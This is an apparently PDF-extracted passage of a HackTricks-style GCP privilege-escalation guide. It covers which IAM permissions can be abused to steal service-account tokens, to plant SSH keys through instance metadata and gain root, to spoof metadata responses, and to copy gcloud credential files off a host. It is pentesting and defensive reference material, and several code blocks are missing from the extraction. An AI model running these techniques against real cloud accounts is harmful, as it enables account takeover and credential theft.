- compute.backendServices.list
- compute.disks.list
- compute.firewalls.list
- compute.healthChecks.list
- compute.instanceGroups.list
- compute.instances.getIamPolicy
- compute.instances.list
- compute.networks.list
- compute.projects.get
- compute.securityPolicies.list
- compute.subnetworks.list
- compute.targetHttpProxies.list
- container.clusters.list
- dns.managedZones.list
- iam.serviceAccountKeys.list
- iam.serviceAccounts.list
- logging.logMetrics.list
- logging.sinks.list
- monitoring.alertPolicies.list
- resourcemanager.folders.get
- resourcemanager.folders.getIamPolicy
- resourcemanager.folders.list
- resourcemanager.hierarchyNodes.listTagBindings
- resourcemanager.organizations.get
- resourcemanager.organizations.getIamPolicy
- resourcemanager.projects.get
- resourcemanager.projects.getIamPolicy
- resourcemanager.projects.list
- resourcemanager.resourceTagBindings.list
- resourcemanager.tagKeys.get
- resourcemanager.tagKeys.getIamPolicy
- resourcemanager.tagKeys.list
- resourcemanager.tagValues.get
- resourcemanager.tagValues.getIamPolicy
- resourcemanager.tagValues.list
- storage.buckets.getIamPolicy
- storage.buckets.list
Cartography
From https://lyft.github.io/cartography/modules/gcp/config.html
roles/iam.securityReviewer
roles/resourcemanager.organizationViewer
roles/resourcemanager.folderViewer
Starbase
From https://github.com/JupiterOne/graph-google-
cloud/blob/main/docs/development.md
roles/iam.securityReviewer
roles/iam.organizationRoleViewer
roles/bigquery.metadataViewer
GCP - Privilege Escalation
Support HackTricks and get benefits!
Introduction to GCP Privilege
Escalation
GCP, as any other cloud, have some principals: users, groups and service
accounts, and some resources like compute engine, cloud functions…\
Then, via roles, permissions are granted to those principals over the
resources. This is the way to specify the permissions a principal has over a
resource in GCP.\ There are certain permissions that will allow a user to get
even more permissions on the resource or third party resources, and that’s
what is called privilege escalation (also, the exploitation the vulnerabilities
to get more permissions).
Obviously, the most interesting privilege escalation techniques are the ones
of the second group because it will allow you to get more privileges
outside of the resources you already have some privileges over. However,
note that escalating in resources may give you also access to sensitive
information or even to other principals (maybe via reading a secret that
contains a token of a SA).
It's important to note also that in GCP Service Accounts are both
principals and permissions, so escalating privileges in a SA will allow
you to impersonate it also.
GCP has hundreds (if not thousands) of permissions that an entity can be
granted. In this book you can find all the permissions that I know that you
can abuse to escalate privileges, but if you know some path not mentioned
here, please share it.
Apikeys Privesc
Cloudbuild Privesc
Cloudfunctions Privesc
Cloudscheduler Privesc
Compute Privesc
Composer Privesc
Container Privesc
Deploymentmanager Privesc
IAM Privesc
Orgpolicy Privesc
Resourcemanager Privesc
Run Privesc
Secretmanager Privesc
Serviceusage Privesc
Storage Privesc
Misc Privesc
gcp-local-privilege-escalation-ssh-pivoting.md
References
https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-
platform-part-1/
https://rhinosecuritylabs.com/cloud-security/privilege-escalation-
google-cloud-platform-part-2/
Therefore, with an API key you can make that company pay for your use of
the API, but you won't be able to escalate privileges.
apikeys.keys.create
This permission allows to create an API key:
"name":"projects/5[...]6/locations/global/keys/f707[...]e8",
"uid":"f707[...]e8",
"updateTime":"2022-01-26T12:23:06.378442Z"
}
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here.
apikeys.keys.getKeyString ,
apikeys.keys.list
These permissions allows list and get all the apiKeys and get the Key:
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here.
apikeys.keys.regenerate ,
apikeys.keys.list
These permissions will (potentially) allow you to list and regenerate all
the apiKeys getting the new Key.\ It’s not possible to use this from
gcloud but you probably can use it via the API. Once it’s supported, the
exploitation will be similar to the previous one (I guess).
apikeys.keys.lookup
This is extremely useful to check to which GCP project an API key that
you have found belongs to:
You can find the original exploit script here on GitHub (but the location
it's taking the token from didn't work for me). Therefore, check a script to
automate the creation, exploit and cleaning of a vuln environment here
and a python script to get a reverse shell inside of the cloudbuild machine
and steal it here (in the code you can find how to specify other service
accounts).
cloudbuild.builds.update
Potentially with this permission you will be able to update a cloud build
and just steal the service account token like it was performed with the
previous permission (but unfortunately at the time of this writing I couldn't
find any way to call that API).
cloudfunctions.functions.call OR
cloudfunctions.functions.setIamPolicy
cloudfunctions.functions.create
cloudfunctions.functions.sourceCodeSet
iam.serviceAccounts.actAs
The script for this method uses a premade Cloud Function that is included
on GitHub, meaning you will need to upload the associated .zip file and
make it public on Cloud Storage (see the exploit script for more
information). Once the function is created and uploaded, you can either
invoke the function directly or modify the IAM policy to allow you to
invoke the function. The response will include the access token belonging
to the Service Account assigned to that Cloud Function.
The script creates the function and waits for it to deploy, then it runs it and
gets returned the access token.
The exploit scripts for this method can be found here and here and the
prebuilt .zip file can be found here.
cloudfunctions.functions.update ,
iam.serviceAccounts.actAs
Similar to cloudfunctions.functions.create, this method updates
(overwrites) an existing function instead of creating a new one. The API
used to update the function also allows you to swap the Service Account if
you have another one you want to get the token for. The script will
update the target function with the malicious code, then wait for it to
deploy, then finally invoke it to be returned the Service Account access
token.
cloudfunctions.functions.sourceCodeSet
cloudfunctions.functions.update
iam.serviceAccounts.actAs
cloudfunctions.functions.setIamPol
icy , iam.serviceAccounts.actAs
Give yourself any of the previous .update or .create privileges to escalate.
Because we control all aspects of the HTTP request being made from Cloud
Scheduler, we can set it up to hit another Google API endpoint. For
example, if we wanted to create a new job that will use a specific Service
Account to create a new Storage bucket on our behalf, we could run the
following command:
This command would schedule an HTTP POST request for every minute
that authenticates as 111111111111-
[email protected]. The request will hit the Cloud
Storage API endpoint and will create a new bucket with the name “new-
bucket-name�?.
cloudscheduler.jobs.create
cloudscheduler.locations.list
iam.serviceAccounts.actAs
To escalate our privileges with this method, we just need to craft the
HTTP request of the API we want to hit as the Service Account we pass
in. Instead of a script, you can just use the gcloud command above.
A similar method may be possible with Cloud Tasks, but we were not able
to do it in our testing.
gcp-local-privilege-escalation-ssh-pivoting.md
compute.instances.setMetadata
This permission gives the same privileges as the previous permission but
over a specific instances instead to a whole project. The same exploits and
limitations as for the previous section applies.
compute.instances.setIamPolicy
This kind of permission will allow you to grant yourself a role with the
previous permissions and escalate privileges abusing them.
compute.instances.osLogin
If OSLogin is enabled in the instance, with this permission you can just run
gcloud compute ssh [INSTANCE] and connect to the instance. You won't
have root privs inside the instance.
compute.instances.osAdminLogin
If OSLogin is enabled in the instance, with this permission you can just run
gcloud compute ssh [INSTANCE] and connect to the instance. You will
have root privs inside the instance.
compute.instances.create , iam.serv
iceAccounts.actAs
This method creates a new Compute Engine instance with a specified
Service Account, then sends the token belonging to that Service Account
to an external server.
compute.disks.create
compute.instances.create
compute.instances.setMetadata
compute.instances.setServiceAccount
compute.subnetworks.use
compute.subnetworks.useExternalIp
iam.serviceAccounts.actAs
osconfig.patchDeployments.create |
osconfig.patchJobs.exec
If you have the osconfig.patchDeployments.create or
osconfig.patchJobs.exec permissions you can create a patch job or
deployment. This will enable you to move laterally in the environment and
gain code execution on all the compute instances within a project.
If you want to manually exploit this you will need to create either a patch
job or deployment for a patch job run:
Without extra permissions, the credentials are pretty basic as you can just
list some resource, but hey are useful to find miss-configurations in the
environment.
If you don't have this permission you can still access the cluster, but you
need to create your own kubectl config file with the clusters info. A new
generated one looks like this:
apiVersion: v1
clusters:
- cluster:
certificate-authority-data:
LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVMRENDQXBTZ0F3SUJBZ0l
RRzNaQmJTSVlzeVRPR1FYODRyNDF3REFOQmdrcWhraUc5dzBCQVFzRkFEQXYKTV
Mwd0t3WURWUVFERXlRMk9UQXhZVEZoWlMweE56ZGxMVFF5TkdZdE9HVmhOaTAzW
VdFM01qVmhNR05tTkdFdwpJQmNOTWpJeE1qQTBNakl4T1RJMFdoZ1BNakExTWpF
eE1qWXlNekU1TWpSYU1DOHhMVEFyQmdOVkJBTVRKRFk1Ck1ERmhNV0ZsTFRFM04
yVXROREkwWmkwNFpXRTJMVGRoWVRjeU5XRXdZMlkwWVRDQ0FhSXdEUVlKS29aSW
h2Y04KQVFFQkJRQURnZ0dQQURDQ0FZb0NnZ0dCQU00TWhGemJ3Y3VEQXhiNGt5W
ndrNEdGNXRHaTZmb0pydExUWkI4Rgo5TDM4a2V2SUVWTHpqVmtoSklpNllnSHg4
SytBUHl4RHJQaEhXMk5PczFNMmpyUXJLSHV6M0dXUEtRUmtUWElRClBoMy9MMDV
tbURwRGxQK3hKdzI2SFFqdkE2Zy84MFNLakZjRXdKRVhZbkNMMy8yaFBFMzdxN3
hZbktwTWdKVWYKVnoxOVhwNEhvbURvOEhUN2JXUTJKWTVESVZPTWNpbDhkdDZQd
3FUYmlLNjJoQzNRTHozNzNIbFZxaiszNy90RgpmMmVwUUdFOG90a0VVOFlHQ3Fs
RTdzaVllWEFqbUQ4bFZENVc5dk1RNXJ0TW8vRHBTVGNxRVZUSzJQWk1rc0hyCmM
wbGVPTS9LeXhnaS93TlBRdW5oQ2hnRUJIZTVzRmNxdmRLQ1pmUFovZVI1Qk0vc0
w1WFNmTE9sWWJLa2xFL1YKNFBLNHRMVmpiYVg1VU9zMUZIVXMrL3IyL1BKQ2hJT
kRaVTV2VjU0L1c5NWk4RnJZaUpEYUVGN0pveXJvUGNuMwpmTmNjQ2x1eGpOY1Ns
Z01ISGZKRzZqb0FXLzB0b2U3ek05RHlQOFh3NW44Zm5lQm5aVTFnYXNKREZIYVl
ZbXpGCitoQzFETmVaWXNibWNxOGVPVG9LOFBKRjZ3SURBUUFCbzBJd1FEQU9CZ0
5WSFE4QkFmOEVCQU1DQWdRd0R3WUQKVlIwVEFRSC9CQVV3QXdFQi96QWRCZ05WS
FE0RUZnUVU5UkhvQXlxY3RWSDVIcmhQZ1BjYzF6Sm9kWFV3RFFZSgpLb1pJaHZj
TkFRRUxCUUFEZ2dHQkFLbnp3VEx0QlJBVE1KRVB4TlBNbmU2UUNqZDJZTDgxcC9
oeVc1eWpYb2w5CllkMTRRNFVlVUJJVXI0QmJadzl0LzRBQ3ZlYUttVENaRCswZ2
wyNXVzNzB3VlFvZCtleVhEK2I1RFBwUUR3Z1gKbkJLcFFCY1NEMkpvZ29tT3M3U
1lPdWVQUHNrODVvdWEw
REpXLytQRkY1WU5ublc3Z1VLT2hNZEtKcnhuYUVGZAprVVl1TVdPT0d4U29qVnd
mNUsyOVNCbGJ5YXhDNS9tOWkxSUtXV2piWnZPN0s4TTlYLytkcDVSMVJobDZOSV
NqCi91SmQ3TDF2R0crSjNlSjZneGs4U2g2L28yRnhxZWFNdDladWw4MFk4STBZa
GxXVmlnSFMwZmVBUU1NSzUrNzkKNmozOWtTZHFBYlhPaUVOMzduOWp2dVlNN1Zv
QzlNUk1oYUNyQVNhR2ZqWEhtQThCdlIyQW5iQThTVGpQKzlSMQp6VWRpK3dsZ0V
4bnFvVFpBcUVHRktuUTlQcjZDaDYvR0xWWStqYXhuR3lyUHFPYlpNZTVXUDFOUG
s4NkxHSlhCCjc1elFvanEyRUpxanBNSjgxT0gzSkxOeXRTdmt4UDFwYklxTzV4Q
UV0OWxRMjh4N28vbnRuaWh1WmR6M0lCRU8KODdjMDdPRGxYNUJQd0hIdzZtKzZj
UT09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
server: https://34.123.141.28
name: gke_security-devbox_us-central1_autopilot-cluster-1
contexts:
- context:
cluster: gke_security-devbox_us-central1_autopilot-cluster-
1
user: gke_security-devbox_us-central1_autopilot-cluster-1
name: gke_security-devbox_us-central1_autopilot-cluster-1
current-context: gke_security-devbox_us-central1_autopilot-
cluster-1
kind: Config
preferences: {}
users:
- name: gke_security-devbox_us-central1_autopilot-cluster-1
user:
auth-provider:
config:
access-token: <access token>
cmd-args: config config-helper --format=json
cmd-path: gcloud
expiry: "2022-12-06T01:13:11Z"
expiry-key: '{.credential.token_expiry}'
token-key: '{.credential.access_token}'
name: gcp
container.roles.escalate |
container.clusterRoles.escalate
Kubernetes by default prevents principals from being able to create or
update Roles and ClusterRoles with more permissions that the ones the
principal has. However, a GCP principal with that permissions will be able
to create/update Roles/ClusterRoles with more permissions that ones he
held, effectively bypassing the Kubernetes protection against this behaviour.
container.roles.bind |
container.clusterRoles.bind
Kubernetes by default prevents principals from being able to create or
update RoleBindings and ClusterRoleBindings to give more permissions
that the ones the principal has. However, a GCP principal with that
permissions will be able to create/update
RolesBindings/ClusterRolesBindings with more permissions that ones
he has, effectively bypassing the Kubernetes protection against this
behaviour.
container.roleBindings.create and/or
container.roleBindings.update OR
container.clusterRoleBindings.create and/or
container.clusterRoleBindings.update respectively are also necessary
to perform those privilege escalation actions.
container.cronJobs.create |
container.cronJobs.update |
container.daemonSets.create |
container.daemonSets.update |
container.deployments.create |
container.deployments.update |
container.jobs.create |
container.jobs.update |
container.pods.create |
container.pods.update |
container.replicaSets.create |
container.replicaSets.update |
container.replicationControllers.c
reate |
container.replicationControllers.u
pdate |
container.scheduledJobs.create |
container.scheduledJobs.update |
container.statefulSets.create |
container.statefulSets.update
All these permissions are going to allow you to create or update a
resource where you can define a pod. Defining a pod you can specify the
SA that is going to be attached and the image that is going to be run,
therefore you can run an image that is going to exfiltrate the token of the
SA to your server allowing you to escalate to any service account.\ For
more information check:
As we are in a GCP environment, you will also be able to get the nodepool
GCP SA from the metadata service and escalate privileges in GCP (by
default the compute SA is used).
container.secrets.get |
container.secrets.list
As explained in this page, with these permissions you can read the tokens
of all the SAs of kubernetes, so you can escalate to them.
container.pods.exec
With this permission you will be able to exec into pods, which gives you
access to all the Kubernetes SAs running in pods to escalate privileges
within K8s, but also you will be able to steal the GCP Service Account of
the NodePool, escalating privileges in GCP.
container.pods.portForward
As explained in this page, with these permissions you can access local
services running in pods that might allow you to escalate privileges in
Kubernetes (and in GCP if somehow you manage to talk to the metadata
service).
container.serviceAccounts.createTo
ken
Because of the name of the permission, it looks like that it will allow you
to generate tokens of the K8s Service Accounts, so you will be able to
privesc to any SA inside Kubernetes. However, I couldn't find any API
endpoint to use it, so let me know if you find it.
container.mutatingWebhookConfigura
tions.create |
container.mutatingWebhookConfigura
tions.update
These permissions might allow you to escalate privileges in Kubernetes, but
more probably, you could abuse them to persist in the cluster.\ For more
information follow this link.
deploymentmanager.deployments.upda
te
This is like the previous abuse but instead of creating a new deployment,
you modifies one already existing (so be careful)
deploymentmanager.deployments.setI
amPolicy
This is like the previous abuse but instead of directly creating a new
deployment, you first give you that access and then abuses the permission
as explained in the previous deploymentmanager.deployments.create
section.
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here and a python script to abuse this privilege here.
For more information check the original research.
iam.serviceAccounts.getAccessToken
( iam.serviceAccounts.get )
This permission allows to request an access token that belongs to a
Service Account, so it's possible to request an access token of a Service
Account with more privileges than ours.
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here and a python script to abuse this privilege here.
For more information check the original research.
iam.serviceAccountKeys.create
This permission allows us to do something similar to the previous method,
but instead of an access token, we are creating a user-managed key for a
Service Account, which will allow us to access GCP as that Service
Account.
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here and a python script to abuse this privilege here.
For more information check the original research.
iam.serviceAccounts.implicitDelega
tion
If you have the iam.serviceAccounts.implicitDelegation permission on
a Service Account that has the iam.serviceAccounts.getAccessToken
iam.serviceAccounts.signBlob
The iam.serviceAccounts.signBlob permission “allows signing of
arbitrary payloads�? in GCP. This means we can create an unsigined
JWT of the SA and then send it as a blob to get the JWT signed by the
SA we are targeting. For more information read this.
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here and a python script to abuse this privilege here and
here. For more information check the original research.
iam.serviceAccounts.signJwt
Similar to how the previous method worked by signing arbitrary payloads,
this method works by signing well-formed JSON web tokens (JWTs). The
difference with the previous method is that instead of making google sign
a blob containing a JWT, we use the signJWT method that already
expects a JWT. This makes it easier to use but you can only sign JWT
instead of any bytes.
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here and a python script to abuse this privilege here.
For more information check the original research.
iam.serviceAccounts.setIamPolicy
This permission allows to add IAM policies to service accounts. You can
abuse it to grant yourself the permissions you need to impersonate the
service account. In the following example we are granting ourselves the
roles/iam.serviceAccountTokenCreator role over the interesting SA:
gcloud iam service-accounts add-iam-policy-binding
"${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \
--member="user:[email protected]" \
--role="roles/iam.serviceAccountTokenCreator"
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here.
iam.serviceAccounts.actAs
This means that as part of creating certain resources, you must “actAs�?
the Service Account for the call to complete successfully. For example,
when starting a new Compute Engine instance with an attached Service
Account, you need iam.serviceAccounts.actAs on that Service Account.
This is because without that permission, users could escalate permissions
with fewer permissions to start with.
iam.serviceAccounts.getOpenIdToken
This permission can be used to generate an OpenID JWT. These are used to
assert identity and do not necessarily carry any implicit authorization
against a resource.
You can generate an OpenIDToken (if you have the access) with:
Some services that support authentication via this kind of tokens are:
You can find an example on how to create and OpenID token behalf a
service account here.
cloudkms.cryptoKeyVersions.useToDe
crypt
You can use this permission to decrypt information with the key you have
this permission over.
resourcemanager.folders.setIamPoli
cy
Like in the exploitation of iam.serviceAccounts.setIamPolicy , this
permission allows you to modify your permissions against any resource at
folder level. So, you can follow the same exploitation example.
resourcemanager.projects.setIamPol
icy
Like in the exploitation of iam.serviceAccounts.setIamPolicy , this
permission allows you to modify your permissions against any resource at
project level. So, you can follow the same exploitation example.
run.services.create
iam.serviceaccounts.actAs
run.services.setIamPolicy OR run.routes.invoke
This method uses an included Docker image that must be built and hosted
to exploit correctly. The image is designed to tell Cloud Run to respond
with the Service Account’s access token when an HTTP request is made.
The exploit script for this method can be found here and the Docker image
can be found here.
secretmanager.secrets.setIamPolicy
This give you access to give you access to read the secrets from the secret
manager.
Therefore, with an API key you can make that company pay for your use of
the API, but you won't be able to escalate privileges.
serviceusage.apiKeys.create
There is another method of authenticating with GCP APIs known as API
keys. By default, they are created with no restrictions, which means they
have access to the entire GCP project they were created in. We can
capitalize on that fact by creating a new API key that may have more
privileges than our own user. There is no official API for this, so a custom
HTTP request needs to be sent to https://apikeys.clients6.google.com/ (or
https://apikeys.googleapis.com/). This was discovered by monitoring the
HTTP requests and responses while browsing the GCP web console. For
documentation on the restrictions associated with API keys, visit this link.
The following screenshot shows how you would create an API key in the
web console.
With the undocumented API that was discovered, we can also create API
keys through the API itself.
The screenshot above shows a POST request being sent to retrieve a new
API key for the project.
serviceusage.apiKeys.list
Another undocumented API was found for listing API keys that have
already been created (this can also be done in the web console). Because
you can still see the API key’s value after its creation, we can pull all the
API keys in the project.
The screenshot above shows that the request is exactly the same as before,
it just is a GET request instead of a POST request. This only shows a single
key, but if there were additional keys in the project, those would be listed
too.
.
GCP - Storage Privesc
Support HackTricks and get benefits!
storage
storage.objects.get
This permission allows you to download files stored inside Gcp Storage.
This will potentially allow you to escalate privileges because in some
occasions sensitive information is saved there. Moreover, some Gcp
services stores their information in buckets:
storage.objects.create ,
storage.objects.delete
In order to create a new object inside a bucket you need
storage.objects.create and, according to the docs, you need also
storage.objects.delete to modify an existent object.
A very common exploitation of buckets where you can write in cloud is in
case the bucket is saving web server files, you might be able to store new
code that will be used by the web application.
Moreover, several GCP services also store code inside buckets that later is
executed:
storage.objects.setIamPolicy
You can give you permission to abuse any of the previous scenarios of
this section.
storage.buckets.setIamPolicy
For an example on how to modify permissions with this permission check
this page:
gcp-public-buckets-privilege-escalation.md
storage.hmacKeys.create
There is a feature of Cloud Storage, “interoperability�?, that provides a
way for Cloud Storage to interact with storage offerings from other cloud
providers, like AWS S3. As part of that, there are HMAC keys that can be
created for both Service Accounts and regular users. We can escalate
Cloud Storage permissions by creating an HMAC key for a higher-
privileged Service Account.
HMAC keys belonging to your user cannot be accessed through the API
and must be accessed through the web console, but what’s nice is that both
the access key and secret key are available at any point. This means we
could take an existing pair and store them for backup access to the account.
HMAC keys belonging to Service Accounts can be accessed through the
API, but after creation, you are not able to see the access key and secret
again.
Composer
Composer is Apache Airflow managed inside GCP. It has several
interesting features:
GCR
Google Container Registry stores the images inside buckets, if you
can write those buckets you might be able to move laterally to
where those buckets are being run.
cloudfunctions.functions.setIamPolicy
Modify the policy of a Cloud Function to allow yourself to invoke
it.
There are tens of resources types with this kind of permission, you can find
all of them in https://cloud.google.com/iam/docs/permissions-reference
searching for setIamPolicy.
*.create, *.update
These permissions can be very useful to try to escalate privileges in
resources by creating a new one or updating a new one. These can of
permissions are specially useful if you also has the permission
iam.serviceAccounts.actAs over a Service Account and the resource you
have .create/.update over can attach a service account.
*ServiceAccount*
This permission will usually let you access or modify a Service Account
in some resource (e.g.: compute.instances.setServiceAccount). This could
lead to a privilege escalation vector, but it will depend on each case.
This agent monitors the metadata for changes. Inside the metadata there
is a field with authorized SSH public keys.\ Therefore, when a new public
SSH key appears in the metadata, the agent will authorize it in the user’s
.authorized_key file and it will create a new user if necessary and
adding it to sudoers.
The way the Google Guest Agent monitors for changes is through a call to
retrieve all metadata values recursively ( GET /computeMetadata/v1/?
Escape
ARP spoofing does not work on Google Compute Engine networks,
however, Ezequiel generated this modified version of rshijack that can be
used to inject a packet in the communication to inject the SSH user.
This modified version of rshijack allows to pass the ACK and SEQ
numbers as command-line arguments, saving time and allowing us to
spoof a response before the real Metadata response came.\ \ Moreover, this
small Shell script that would return a specially crafted payload that would
trigger the Google Guest Agent to create the user wouter , with our own
public key in its .authorized_keys file. \ This script receives the ETag as
a parameter, since by keeping the same ETag, the Metadata server wouldn’t
immediately tell the Google Guest Agent that the metadata values were
different on the next response, instead waiting the specified amount of
seconds in timeout_sec.\ \ To achieve the spoofing, you should watch
requests to the Metadata server with tcpdump: tcpdump -S -i eth0
'host 169.254.169.254 and port 80' & waiting for a line that looked like
this:
{ % code overflow="wrap" %}
We you see that value send the fake metadata data with the correct
ETAG to rshijack :
And this should make the agent authorize that public key that will allow
you to connect via SSH with the private key.
References
https://www.ezequiel.tech/2020/08/dropping-shell-in.html
https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-
postgresql-vulnerabilities
Running gsutil ls from the command line returns nothing, as the service
account is lacking the storage.buckets.list IAM permission. However,
if you ran gsutil ls gs://instance82736-long-term-xyz-archive-
0332893 you may find a complete filesystem backup, giving you clear-text
access to data that your local Linux account lacks.
You may be able to find this bucket name inside a script (in bash, Python,
Ruby...).
Custom Metadata
Administrators can add custom metadata at the instance and project level.
This is simply a way to pass arbitrary key/value pairs into an instance,
and is commonly used for environment variables and startup/shutdown
scripts.
Default service account\ If the service account access scope is set to full
access or at least is explicitly allowing access to the compute API, then
this configuration is vulnerable to escalation. The default scope is not
vulnerable.
Custom service account\ When using a custom service account, one of the
following IAM permissions is necessary to escalate privileges:
Although Google recommends not using access scopes for custom service
accounts, it is still possible to do so. You'll need one of the following access
scopes:
https://www.googleapis.com/auth/compute
https://www.googleapis.com/auth/cloud-platfo rm
So, if you can modify custom instance metadata with your service
account, you can escalate to root on the local system by gaining SSH
rights to a privileged account. If you can modify custom project
metadata, you can escalate to root on any system in the current GCP
project that is running the accounts daemon.
Check the instance for existing SSH keys. Pick one of these users as they
are likely to have sudo rights.
Notice the slightly odd format of the public keys - the username is listed
at the beginning (followed by a colon) and then again at the end. We'll
need to match this format. Unlike normal SSH key operation, the username
absolutely matters!
Save the lines with usernames and keys in a new text file called
meta.txt .
Let's assume we are targeting the user alice from above. We'll generate
a new key for ourselves like this:
Add your new public key to the file meta.txt imitating the format:
alice:ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMM
vNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1
CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJU
bWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+Mt
DHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuh
aHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ alice
bob:ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgO
Gj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3
VbW9oQbnlaBz6AYwgGHE3Fdrbkg/Ew8SZAvvvZ3bCwv0i5s+vWM3ox5SIs7/W4v
RQBUB4DIDPtj0nK1d1ibxCa59YA8GdpIf797M0CKQ85DIjOnOrlvJH/qUnZ9fbh
aHzlo2aSVyE6/wRMgToZedmc6RzQG2byVxoyyLPovt1rAZOTTONg2f3vu62xVa/
PIk4cEtCN3dTNYYf3NxMPRF6HCbknaM9ixmu3ImQ7+vG3M+g9fALhBmmF bob
alice:ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDnthNXHxi31LX8PlsGdIF/wlWmI0fPzuM
rv7Z6rqNNgDYOuOFTpM1Sx/vfvezJNY+bonAPhJGTRCwAwytXIcW6JoeX5NEJsv
EVSAwB1scOSCEAMefl0FyIZ3ZtlcsQ++LpNszzErreckik3aR+7LsA2TCVBjdlP
uxh4mvWBhsJAjYS7ojrEAtQsJ0mBSd20yHxZNuh7qqG0JTzJac7n8S5eDacFGWC
xQwPnuINeGoacTQ+MWHlbsYbhxnumWRvRiEm7+WOg2vPgwVpMp4sgz0q5r7n/l7
YClvh/qfVquQ6bFdpkVaZmkXoaO74Op2Sd7C+MBDITDNZPpXIlZOf4OLb alice
Now, you can re-write the SSH key metadata for your instance with the
following command:
gcloud compute instances add-metadata [INSTANCE] --metadata-
from-file ssh-keys=meta.txt
You can follow the same process as above, but just make up a new
username. This user will be created automatically and given rights to
sudo . Scripted, the process would look like this:
# define the new account username
NEWUSER="definitelynotahacker"
# create a key
ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P ""
This will generate a new SSH key, add it to your existing user, and add
your existing username to the google-sudoers group, and start a new
SSH session. While it is quick and easy, it may end up making more
changes to the target system than the previous methods.
We can expand upon those a bit by applying SSH keys at the project
level, granting you permission to SSH into a privileged account for any
instance that has not explicitly chosen the "Block project-wide SSH keys"
option.:
If you're really bold, you can also just type gcloud compute ssh
OS Login is enabled at the project or instance level using the metadata key
of enable-oslogin = TRUE .
Unlike managing only with SSH keys, these permissions allow the
administrator to control whether or not sudo is granted.
If your service account has these permissions. You can simply run the
gcloud compute ssh [INSTANCE] command to connect manually as the
service account. Two-factor is only enforced when using user accounts, so
that should not slow you down even if it is assigned as shown above.
Similar to using SSH keys from metadata, you can use this strategy to
escalate privileges locally and/or to access other Compute Instances on
the network.
OS Patching
Depending on the privileges associated with the service account you have
access to, if it has either the osconfig.patchDeployments.create or
osconfig.patchJobs.exec permissions you can create a patch job or
deployment. This will enable you to move laterally in the environment and
gain code execution on all the compute instances within a project.
Now check the permissions offered by the role, if it has access to either the
patch deployment or job continue.
gcloud iam roles describe roles/<role name> | grep -E
'(osconfig.patchDeployments.create|osconfig.patchJobs.exec)'
If you want to manually exploit this you will need to create either a patch
job or deployment for a patch job run:
gcloud compute os-config patch-jobs execute --file=patch.json
First, find what gcloud config directories exist in users' home folders.
You can manually inspect the files inside, but these are generally the ones
with the secrets:
~/.config/gcloud/credentials.db
~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json
~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto
~/.credentials.json
Now, you have the option of looking for clear text credentials in these files
or simply copying the entire gcloud folder to a machine you control and
running gcloud auth list to see what accounts are now available to you.
AI Platform Enum
Cloud Functions, App Engine & Cloud Run Enum
Compute Instances Enum
Compute Network Enum
Containers & GKE Enum
Databases Enum
DNS Enum
Filestore Enum
KMS & Secrets Management
Pub/Sub
Source Repositories
Stackdriver Enum
Storage Enum
There are a few areas here you can look for interesting information like
models and jobs.
# Models
gcloud ai-platform models list
gcloud ai-platform models describe <model>
gcloud ai-platform models get-iam-policy <model>
# Jobs
gcloud ai-platform jobs list
gcloud ai-platform jobs describe <job>
# List functions
gcloud functions list
Privesc
In the following page you can check how to abuse cloud function
permissions to escalate privileges:
############################
# Run this tool to find Cloud Functions that permit
unauthenticated invocations
# anywhere in your GCP organization.
# Enjoy!
############################
if [ -z "$enabled" ]; then
continue
fi
if [ -z "$all_auth" ]
then
:
else
echo "[!] Open to all authenticated users: $proj:
$func"
fi
done
done
App Engine Configurations
Google App Engine is another "serverless" offering for hosting
applications, with a focus on scalability. As with Cloud Functions, there is
a chance that the application will rely on secrets that are accessed at
run-time via environment variables. These variables are stored in an
app.yaml file which can be accessed as follows:
The access to this web server might be public of managed via IAM
permissions:
gcp-run-privesc.md
############################
# Run this tool to find Cloud Run services that permit
unauthenticated
# invocations anywhere in your GCP organization.
# Enjoy!
############################
if [ -z "$enabled" ]; then
continue
fi
if [ -z "$all_users" ]
then
:
else
echo "[!] Open to all users: $proj: $run"
fi
if [ -z "$all_auth" ]
then
:
else
echo "[!] Open to all authenticated users: $proj:
$run"
fi
done
done
References
https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-
privileges-in-google-cloud-platform/#reviewing-stackdriver-logging
gcp-local-privilege-escalation-ssh-pivoting.md
Privesc
In the following page you can check how to abuse compute permissions
to escalate privileges:
gcp-compute-privesc.md
Metadata
For info about how to access the metadata endpoint from a machine check:
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-
forgery/cloud-ssrf#6440
Administrators can add custom metadata at the instance and project level.
This is simply a way to pass arbitrary key/value pairs into an instance,
and is commonly used for environment variables and startup/shutdown
scripts. This can be obtained using the describe method from a command
in the previous section, but it could also be retrieved from the inside of the
instance accessing the metadata endpoint.
You can then export the virtual disks from any image in multiple formats.
The following command would export the image test-image in qcow2
format, allowing you to download the file and build a VM locally for
further investigation:
